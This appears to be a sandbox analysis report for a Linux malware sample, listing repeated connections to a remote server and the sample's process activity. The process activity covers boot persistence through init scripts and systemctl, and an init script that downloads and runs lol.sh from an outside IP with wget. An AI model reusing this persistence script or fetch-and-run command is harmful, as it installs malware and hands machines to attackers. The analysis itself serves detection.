Dec 27, 2024 09:23:02.764754057 CET	60126	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:02.884463072 CET	38242	60126	94.156.227.234	192.168.2.23
Dec 27, 2024 09:23:02.884562969 CET	60126	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:02.884654999 CET	60126	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:03.004139900 CET	38242	60126	94.156.227.234	192.168.2.23
Dec 27, 2024 09:23:03.388753891 CET	60126	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:03.548535109 CET	38242	60126	94.156.227.234	192.168.2.23
Dec 27, 2024 09:23:04.081706047 CET	38242	60126	94.156.227.234	192.168.2.23
Dec 27, 2024 09:23:04.081777096 CET	60126	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:04.389722109 CET	60128	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:04.509488106 CET	38242	60128	94.156.227.234	192.168.2.23
Dec 27, 2024 09:23:04.509725094 CET	60128	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:04.509793043 CET	60128	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:04.629288912 CET	38242	60128	94.156.227.234	192.168.2.23
Dec 27, 2024 09:23:05.014303923 CET	60128	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:05.176543951 CET	38242	60128	94.156.227.234	192.168.2.23
Dec 27, 2024 09:23:05.637175083 CET	38242	60128	94.156.227.234	192.168.2.23
Dec 27, 2024 09:23:05.637366056 CET	60128	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:06.015851974 CET	60130	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:06.135504961 CET	38242	60130	94.156.227.234	192.168.2.23
Dec 27, 2024 09:23:06.135576963 CET	60130	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:06.135606050 CET	60130	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:06.255309105 CET	38242	60130	94.156.227.234	192.168.2.23
Dec 27, 2024 09:23:06.642067909 CET	60130	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:06.804626942 CET	38242	60130	94.156.227.234	192.168.2.23
Dec 27, 2024 09:23:07.256581068 CET	38242	60130	94.156.227.234	192.168.2.23
Dec 27, 2024 09:23:07.256695986 CET	60130	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:07.643609047 CET	60132	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:07.763400078 CET	38242	60132	94.156.227.234	192.168.2.23
Dec 27, 2024 09:23:07.763480902 CET	60132	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:07.763541937 CET	60132	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:07.883102894 CET	38242	60132	94.156.227.234	192.168.2.23
Dec 27, 2024 09:23:08.269877911 CET	60132	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:08.432605982 CET	38242	60132	94.156.227.234	192.168.2.23
Dec 27, 2024 09:23:08.885581970 CET	38242	60132	94.156.227.234	192.168.2.23
Dec 27, 2024 09:23:08.885736942 CET	60132	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:09.271847010 CET	60134	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:09.391488075 CET	38242	60134	94.156.227.234	192.168.2.23
Dec 27, 2024 09:23:09.391676903 CET	60134	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:09.391676903 CET	60134	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:09.511226892 CET	38242	60134	94.156.227.234	192.168.2.23
Dec 27, 2024 09:23:09.897864103 CET	60134	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:10.060563087 CET	38242	60134	94.156.227.234	192.168.2.23
Dec 27, 2024 09:23:10.521330118 CET	38242	60134	94.156.227.234	192.168.2.23
Dec 27, 2024 09:23:10.521404028 CET	60134	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:10.899152994 CET	60136	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:11.018965006 CET	38242	60136	94.156.227.234	192.168.2.23
Dec 27, 2024 09:23:11.019030094 CET	60136	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:11.019073963 CET	60136	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:11.138678074 CET	38242	60136	94.156.227.234	192.168.2.23
Dec 27, 2024 09:23:11.524991989 CET	60136	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:11.688560009 CET	38242	60136	94.156.227.234	192.168.2.23
Dec 27, 2024 09:23:12.248228073 CET	38242	60136	94.156.227.234	192.168.2.23
Dec 27, 2024 09:23:12.248366117 CET	60136	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:12.526247025 CET	60138	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:12.646120071 CET	38242	60138	94.156.227.234	192.168.2.23
Dec 27, 2024 09:23:12.646239996 CET	60138	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:12.646286011 CET	60138	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:12.765954018 CET	38242	60138	94.156.227.234	192.168.2.23
Dec 27, 2024 09:23:13.150873899 CET	60138	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:13.314562082 CET	38242	60138	94.156.227.234	192.168.2.23
Dec 27, 2024 09:23:13.780518055 CET	38242	60138	94.156.227.234	192.168.2.23
Dec 27, 2024 09:23:13.780632973 CET	60138	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:14.152008057 CET	60140	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:14.271738052 CET	38242	60140	94.156.227.234	192.168.2.23
Dec 27, 2024 09:23:14.271811962 CET	60140	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:14.271852016 CET	60140	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:14.392797947 CET	38242	60140	94.156.227.234	192.168.2.23
Dec 27, 2024 09:23:14.778414011 CET	60140	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:14.940696955 CET	38242	60140	94.156.227.234	192.168.2.23
Dec 27, 2024 09:23:15.464895010 CET	38242	60140	94.156.227.234	192.168.2.23
Dec 27, 2024 09:23:15.465013027 CET	60140	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:15.780141115 CET	60142	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:15.899859905 CET	38242	60142	94.156.227.234	192.168.2.23
Dec 27, 2024 09:23:15.899941921 CET	60142	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:15.899976969 CET	60142	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:16.019629002 CET	38242	60142	94.156.227.234	192.168.2.23
Dec 27, 2024 09:23:16.405706882 CET	60142	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:16.568629026 CET	38242	60142	94.156.227.234	192.168.2.23
Dec 27, 2024 09:23:17.029366970 CET	38242	60142	94.156.227.234	192.168.2.23
Dec 27, 2024 09:23:17.029458046 CET	60142	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:17.407174110 CET	60144	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:17.526912928 CET	38242	60144	94.156.227.234	192.168.2.23
Dec 27, 2024 09:23:17.527034998 CET	60144	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:17.527129889 CET	60144	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:17.647994041 CET	38242	60144	94.156.227.234	192.168.2.23
Dec 27, 2024 09:23:18.034410000 CET	60144	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:18.196623087 CET	38242	60144	94.156.227.234	192.168.2.23
Dec 27, 2024 09:23:18.689848900 CET	38242	60144	94.156.227.234	192.168.2.23
Dec 27, 2024 09:23:18.689946890 CET	60144	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:19.035932064 CET	60146	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:19.155533075 CET	38242	60146	94.156.227.234	192.168.2.23
Dec 27, 2024 09:23:19.155711889 CET	60146	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:19.155734062 CET	60146	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:19.275326967 CET	38242	60146	94.156.227.234	192.168.2.23
Dec 27, 2024 09:23:19.662144899 CET	60146	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:19.824695110 CET	38242	60146	94.156.227.234	192.168.2.23
Dec 27, 2024 09:23:20.285818100 CET	38242	60146	94.156.227.234	192.168.2.23
Dec 27, 2024 09:23:20.285927057 CET	60146	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:20.664323092 CET	60148	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:20.784111023 CET	38242	60148	94.156.227.234	192.168.2.23
Dec 27, 2024 09:23:20.784231901 CET	60148	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:20.784393072 CET	60148	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:20.904030085 CET	38242	60148	94.156.227.234	192.168.2.23
Dec 27, 2024 09:23:21.290401936 CET	60148	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:21.456665039 CET	38242	60148	94.156.227.234	192.168.2.23
Dec 27, 2024 09:23:21.979489088 CET	38242	60148	94.156.227.234	192.168.2.23
Dec 27, 2024 09:23:21.979561090 CET	60148	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:22.291188955 CET	60150	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:22.410860062 CET	38242	60150	94.156.227.234	192.168.2.23
Dec 27, 2024 09:23:22.410936117 CET	60150	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:22.410983086 CET	60150	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:22.530740976 CET	38242	60150	94.156.227.234	192.168.2.23
Dec 27, 2024 09:23:22.914838076 CET	60150	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:23.076637983 CET	38242	60150	94.156.227.234	192.168.2.23
Dec 27, 2024 09:23:23.588402987 CET	38242	60150	94.156.227.234	192.168.2.23
Dec 27, 2024 09:23:23.588483095 CET	60150	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:23.915767908 CET	60152	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:24.035396099 CET	38242	60152	94.156.227.234	192.168.2.23
Dec 27, 2024 09:23:24.035517931 CET	60152	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:24.035567045 CET	60152	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:24.155379057 CET	38242	60152	94.156.227.234	192.168.2.23
Dec 27, 2024 09:23:24.539895058 CET	60152	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:24.700642109 CET	38242	60152	94.156.227.234	192.168.2.23
Dec 27, 2024 09:23:25.229146004 CET	38242	60152	94.156.227.234	192.168.2.23
Dec 27, 2024 09:23:25.229238033 CET	60152	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:25.540844917 CET	60154	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:25.660554886 CET	38242	60154	94.156.227.234	192.168.2.23
Dec 27, 2024 09:23:25.660650015 CET	60154	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:25.660696983 CET	60154	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:25.780419111 CET	38242	60154	94.156.227.234	192.168.2.23
Dec 27, 2024 09:23:26.165127039 CET	60154	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:26.328695059 CET	38242	60154	94.156.227.234	192.168.2.23
Dec 27, 2024 09:23:26.821309090 CET	38242	60154	94.156.227.234	192.168.2.23
Dec 27, 2024 09:23:26.821517944 CET	60154	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:27.166668892 CET	60156	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:27.286870003 CET	38242	60156	94.156.227.234	192.168.2.23
Dec 27, 2024 09:23:27.287128925 CET	60156	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:27.287237883 CET	60156	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:27.406964064 CET	38242	60156	94.156.227.234	192.168.2.23
Dec 27, 2024 09:23:27.798609972 CET	60156	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:28.177227974 CET	60156	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:28.208733082 CET	38242	60156	94.156.227.234	192.168.2.23
Dec 27, 2024 09:23:28.296792984 CET	38242	60156	94.156.227.234	192.168.2.23
Dec 27, 2024 09:23:28.407972097 CET	38242	60156	94.156.227.234	192.168.2.23
Dec 27, 2024 09:23:28.408077002 CET	60156	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:28.800384045 CET	60158	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:28.920057058 CET	38242	60158	94.156.227.234	192.168.2.23
Dec 27, 2024 09:23:28.920222998 CET	60158	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:28.920407057 CET	60158	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:29.039844990 CET	38242	60158	94.156.227.234	192.168.2.23
Dec 27, 2024 09:23:29.426332951 CET	60158	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:29.588660002 CET	38242	60158	94.156.227.234	192.168.2.23
Dec 27, 2024 09:23:30.115159988 CET	38242	60158	94.156.227.234	192.168.2.23
Dec 27, 2024 09:23:30.115282059 CET	60158	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:30.427782059 CET	60160	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:30.547524929 CET	38242	60160	94.156.227.234	192.168.2.23
Dec 27, 2024 09:23:30.547648907 CET	60160	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:30.547741890 CET	60160	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:30.667300940 CET	38242	60160	94.156.227.234	192.168.2.23
Dec 27, 2024 09:23:31.054543972 CET	60160	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:31.221601963 CET	38242	60160	94.156.227.234	192.168.2.23
Dec 27, 2024 09:23:31.778698921 CET	38242	60160	94.156.227.234	192.168.2.23
Dec 27, 2024 09:23:31.778779984 CET	60160	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:32.055888891 CET	60162	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:32.175642967 CET	38242	60162	94.156.227.234	192.168.2.23
Dec 27, 2024 09:23:32.175745964 CET	60162	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:32.175797939 CET	60162	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:32.295631886 CET	38242	60162	94.156.227.234	192.168.2.23
Dec 27, 2024 09:23:32.681500912 CET	60162	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:32.844685078 CET	38242	60162	94.156.227.234	192.168.2.23
Dec 27, 2024 09:23:33.316507101 CET	38242	60162	94.156.227.234	192.168.2.23
Dec 27, 2024 09:23:33.316605091 CET	60162	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:33.683078051 CET	60164	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:33.802752972 CET	38242	60164	94.156.227.234	192.168.2.23
Dec 27, 2024 09:23:33.802834988 CET	60164	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:33.802875042 CET	60164	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:33.922476053 CET	38242	60164	94.156.227.234	192.168.2.23
Dec 27, 2024 09:23:34.310204983 CET	60164	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:34.472615957 CET	38242	60164	94.156.227.234	192.168.2.23
Dec 27, 2024 09:23:34.968626022 CET	38242	60164	94.156.227.234	192.168.2.23
Dec 27, 2024 09:23:34.968777895 CET	60164	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:35.311597109 CET	60166	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:35.431404114 CET	38242	60166	94.156.227.234	192.168.2.23
Dec 27, 2024 09:23:35.431602955 CET	60166	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:35.431724072 CET	60166	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:35.551342010 CET	38242	60166	94.156.227.234	192.168.2.23
Dec 27, 2024 09:23:35.937925100 CET	60166	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:36.100790024 CET	38242	60166	94.156.227.234	192.168.2.23
Dec 27, 2024 09:23:36.595639944 CET	38242	60166	94.156.227.234	192.168.2.23
Dec 27, 2024 09:23:36.595818996 CET	60166	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:36.939300060 CET	60168	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:37.059216022 CET	38242	60168	94.156.227.234	192.168.2.23
Dec 27, 2024 09:23:37.059401035 CET	60168	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:37.059506893 CET	60168	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:37.179280996 CET	38242	60168	94.156.227.234	192.168.2.23
Dec 27, 2024 09:23:37.564057112 CET	60168	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:37.724603891 CET	38242	60168	94.156.227.234	192.168.2.23
Dec 27, 2024 09:23:38.235394001 CET	38242	60168	94.156.227.234	192.168.2.23
Dec 27, 2024 09:23:38.235649109 CET	60168	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:38.565732002 CET	60170	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:38.685483932 CET	38242	60170	94.156.227.234	192.168.2.23
Dec 27, 2024 09:23:38.685647011 CET	60170	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:38.685767889 CET	60170	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:38.805385113 CET	38242	60170	94.156.227.234	192.168.2.23
Dec 27, 2024 09:23:39.192101002 CET	60170	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:39.356594086 CET	38242	60170	94.156.227.234	192.168.2.23
Dec 27, 2024 09:23:39.846875906 CET	38242	60170	94.156.227.234	192.168.2.23
Dec 27, 2024 09:23:39.846987963 CET	60170	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:40.193353891 CET	60172	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:40.313196898 CET	38242	60172	94.156.227.234	192.168.2.23
Dec 27, 2024 09:23:40.313323021 CET	60172	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:40.313429117 CET	60172	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:40.433059931 CET	38242	60172	94.156.227.234	192.168.2.23
Dec 27, 2024 09:23:40.820568085 CET	60172	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:40.980681896 CET	38242	60172	94.156.227.234	192.168.2.23
Dec 27, 2024 09:23:41.517999887 CET	38242	60172	94.156.227.234	192.168.2.23
Dec 27, 2024 09:23:41.518084049 CET	60172	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:41.822241068 CET	60174	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:41.942001104 CET	38242	60174	94.156.227.234	192.168.2.23
Dec 27, 2024 09:23:41.942135096 CET	60174	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:41.942203045 CET	60174	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:42.062851906 CET	38242	60174	94.156.227.234	192.168.2.23
Dec 27, 2024 09:23:42.449300051 CET	60174	38242	192.168.2.23	94.156.227.234
Dec 27, 2024 09:23:42.612848997 CET	38242	60174	94.156.227.234	192.168.2.23
Dec 27, 2024 09:23:43.103889942 CET	38242	60174	94.156.227.234	192.168.2.23
Dec 27, 2024 09:23:43.103966951 CET	60174	38242	192.168.2.23	94.156.227.234

System Behavior

Analysis Process: dash PID: 6225, Parent PID: 4331

General

Start time (UTC):	08:21:36
Start date (UTC):	27/12/2024
Path:	/usr/bin/dash
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:21:36
Start date (UTC):	27/12/2024
Path:	/usr/bin/rm
Arguments:	rm -f /tmp/tmp.EDM0uqa4vM /tmp/tmp.kZ6BgYxzeL /tmp/tmp.NeTociq9wR
File size:	72056 bytes
MD5 hash:	aa2b5496fdbfd88e38791ab81f90b95b

Start time (UTC):	08:21:36
Start date (UTC):	27/12/2024
Path:	/usr/bin/dash
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:21:36
Start date (UTC):	27/12/2024
Path:	/usr/bin/rm
Arguments:	rm -f /tmp/tmp.EDM0uqa4vM /tmp/tmp.kZ6BgYxzeL /tmp/tmp.NeTociq9wR
File size:	72056 bytes
MD5 hash:	aa2b5496fdbfd88e38791ab81f90b95b

Start time (UTC):	08:21:37
Start date (UTC):	27/12/2024
Path:	/tmp/sh4.nn.elf
Arguments:	/tmp/sh4.nn.elf
File size:	4139976 bytes
MD5 hash:	8943e5f8f8c280467b4472c15ae93ba9

Start time (UTC):	08:21:37
Start date (UTC):	27/12/2024
Path:	/tmp/sh4.nn.elf
Arguments:	-
File size:	4139976 bytes
MD5 hash:	8943e5f8f8c280467b4472c15ae93ba9

Start time (UTC):	08:21:37
Start date (UTC):	27/12/2024
Path:	/bin/sh
Arguments:	sh -c "systemctl enable custom.service >/dev/null 2>&1"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:21:38
Start date (UTC):	27/12/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:21:38
Start date (UTC):	27/12/2024
Path:	/usr/bin/systemctl
Arguments:	systemctl enable custom.service
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Start time (UTC):	08:21:38
Start date (UTC):	27/12/2024
Path:	/tmp/sh4.nn.elf
Arguments:	-
File size:	4139976 bytes
MD5 hash:	8943e5f8f8c280467b4472c15ae93ba9

Start time (UTC):	08:21:38
Start date (UTC):	27/12/2024
Path:	/bin/sh
Arguments:	sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:21:38
Start date (UTC):	27/12/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:21:38
Start date (UTC):	27/12/2024
Path:	/usr/bin/chmod
Arguments:	chmod +x /etc/init.d/system
File size:	63864 bytes
MD5 hash:	739483b900c045ae1374d6f53a86a279

Start time (UTC):	08:21:38
Start date (UTC):	27/12/2024
Path:	/tmp/sh4.nn.elf
Arguments:	-
File size:	4139976 bytes
MD5 hash:	8943e5f8f8c280467b4472c15ae93ba9

Start time (UTC):	08:21:38
Start date (UTC):	27/12/2024
Path:	/bin/sh
Arguments:	sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:21:38
Start date (UTC):	27/12/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:21:38
Start date (UTC):	27/12/2024
Path:	/usr/bin/ln
Arguments:	ln -s /etc/init.d/system /etc/rcS.d/S99system
File size:	76160 bytes
MD5 hash:	e933cf05571f62c0157d4e2dfcaea282

Start time (UTC):	08:21:38
Start date (UTC):	27/12/2024
Path:	/tmp/sh4.nn.elf
Arguments:	-
File size:	4139976 bytes
MD5 hash:	8943e5f8f8c280467b4472c15ae93ba9

Start time (UTC):	08:21:38
Start date (UTC):	27/12/2024
Path:	/bin/sh
Arguments:	sh -c "echo \"#!/bin/sh\n# /etc/init.d/sh4.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting sh4.nn.elf'\n /tmp/sh4.nn.elf &\n wget http://94.156.227.229/lol.sh -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping sh4.nn.elf'\n killall sh4.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start\|stop\|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/sh4.nn.elf"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:21:38
Start date (UTC):	27/12/2024
Path:	/tmp/sh4.nn.elf
Arguments:	-
File size:	4139976 bytes
MD5 hash:	8943e5f8f8c280467b4472c15ae93ba9

Start time (UTC):	08:21:38
Start date (UTC):	27/12/2024
Path:	/bin/sh
Arguments:	sh -c "chmod +x /etc/init.d/sh4.nn.elf >/dev/null 2>&1"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:21:38
Start date (UTC):	27/12/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:21:38
Start date (UTC):	27/12/2024
Path:	/usr/bin/chmod
Arguments:	chmod +x /etc/init.d/sh4.nn.elf
File size:	63864 bytes
MD5 hash:	739483b900c045ae1374d6f53a86a279

Start time (UTC):	08:21:38
Start date (UTC):	27/12/2024
Path:	/tmp/sh4.nn.elf
Arguments:	-
File size:	4139976 bytes
MD5 hash:	8943e5f8f8c280467b4472c15ae93ba9

Start time (UTC):	08:21:38
Start date (UTC):	27/12/2024
Path:	/bin/sh
Arguments:	sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:21:38
Start date (UTC):	27/12/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:21:38
Start date (UTC):	27/12/2024
Path:	/usr/bin/mkdir
Arguments:	mkdir -p /etc/rc.d
File size:	88408 bytes
MD5 hash:	088c9d1df5a28ed16c726eca15964cb7

Start time (UTC):	08:21:38
Start date (UTC):	27/12/2024
Path:	/tmp/sh4.nn.elf
Arguments:	-
File size:	4139976 bytes
MD5 hash:	8943e5f8f8c280467b4472c15ae93ba9

Start time (UTC):	08:21:38
Start date (UTC):	27/12/2024
Path:	/bin/sh
Arguments:	sh -c "ln -s /etc/init.d/sh4.nn.elf /etc/rc.d/S99sh4.nn.elf >/dev/null 2>&1"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:21:38
Start date (UTC):	27/12/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:21:38
Start date (UTC):	27/12/2024
Path:	/usr/bin/ln
Arguments:	ln -s /etc/init.d/sh4.nn.elf /etc/rc.d/S99sh4.nn.elf
File size:	76160 bytes
MD5 hash:	e933cf05571f62c0157d4e2dfcaea282

Start time (UTC):	08:21:38
Start date (UTC):	27/12/2024
Path:	/tmp/sh4.nn.elf
Arguments:	-
File size:	4139976 bytes
MD5 hash:	8943e5f8f8c280467b4472c15ae93ba9

Start time (UTC):	08:21:38
Start date (UTC):	27/12/2024
Path:	/tmp/sh4.nn.elf
Arguments:	-
File size:	4139976 bytes
MD5 hash:	8943e5f8f8c280467b4472c15ae93ba9

Start time (UTC):	08:21:38
Start date (UTC):	27/12/2024
Path:	/tmp/sh4.nn.elf
Arguments:	-
File size:	4139976 bytes
MD5 hash:	8943e5f8f8c280467b4472c15ae93ba9

Start time (UTC):	08:21:37
Start date (UTC):	27/12/2024
Path:	/usr/lib/udisks2/udisksd
Arguments:	-
File size:	483056 bytes
MD5 hash:	1d7ae439cc3d82fa6b127671ce037a24

Start time (UTC):	08:21:37
Start date (UTC):	27/12/2024
Path:	/usr/sbin/dumpe2fs
Arguments:	dumpe2fs -h /dev/dm-0
File size:	31112 bytes
MD5 hash:	5c66f7d8f7681a40562cf049ad4b72b4

Start time (UTC):	08:21:38
Start date (UTC):	27/12/2024
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Start time (UTC):	08:21:38
Start date (UTC):	27/12/2024
Path:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
Arguments:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File size:	22760 bytes
MD5 hash:	3633b075f40283ec938a2a6a89671b0e

Start time (UTC):	08:21:38
Start date (UTC):	27/12/2024
Path:	/usr/lib/udisks2/udisksd
Arguments:	-
File size:	483056 bytes
MD5 hash:	1d7ae439cc3d82fa6b127671ce037a24

Start time (UTC):	08:21:38
Start date (UTC):	27/12/2024
Path:	/usr/sbin/dumpe2fs
Arguments:	dumpe2fs -h /dev/dm-0
File size:	31112 bytes
MD5 hash:	5c66f7d8f7681a40562cf049ad4b72b4

Start time (UTC):	08:21:39
Start date (UTC):	27/12/2024
